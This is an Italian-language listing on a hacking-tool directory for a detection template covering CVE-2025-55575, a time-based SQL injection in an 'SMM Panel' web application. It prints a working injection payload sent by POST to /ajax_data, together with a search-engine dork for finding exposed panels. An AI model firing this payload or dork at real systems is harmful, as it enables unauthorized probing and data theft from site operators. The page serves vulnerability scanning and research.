Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55575 — Template di rilevamento di SQL injection basato su tempo per SMM Panel. Invia richieste POST create appositamente a `/ajax_data` e identifica endpoint vulnerabili tramite analisi del ritardo delle risposte. | Kitploit
Strumenti/GitHubGitHub/aether-0/cve-2025-55575
Scanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubaether-0/cve-2025-55575

CVE-2025-55575

Template di rilevamento di SQL injection basato su tempo per SMM Panel. Invia richieste POST create appositamente a `/ajax_data` e identifica endpoint vulnerabili tramite analisi del ritardo delle risposte.

Vedi Repository
0 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

smm-panel-sqli(CVE-2025-55575)

Rilevamento di SQL Injection basata sul tempo per SMM Panel


Panoramica

Questo template rileva una vulnerabilità di SQL Injection basata sul tempo nel parametro service_detail del pannello SMM tramite richieste HTTP POST a /ajax_data. Lo sfruttamento può consentire a un attaccante remoto di accedere a dati sensibili o di eseguire escalation dei privilegi.

  • Autore: Aether
  • Gravità: Critica
  • Tag: sqli, mysql, timing, dork:'intitle:"#1 SMM Panel ****"' "smm panel"
  • Riferimento: https://owasp.org/www-community/attacks/SQL_Injection

Logica di rilevamento

Lo strumento invia una richiesta POST costruita ad arte:

root@kitploit:~
POST /ajax_data
Content-Type: application/x-www-form-urlencoded

action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z

Se il tempo di risposta è maggiore di 5 secondi, indica un endpoint vulnerabile.

Esempio di rilevamento

root@kitploit:~
- Method: POST
- Path: {{BaseURL}}/ajax_data
- Headers: Content-Type: application/x-www-form-urlencoded
- Body: action=service_detail&service=1624'XOR(if(now()=sysdate(),SLEEP(5),0))XOR'Z
- Matcher: duration > 5 seconds

Demo video

SQLi PoC


Scarica lo strumento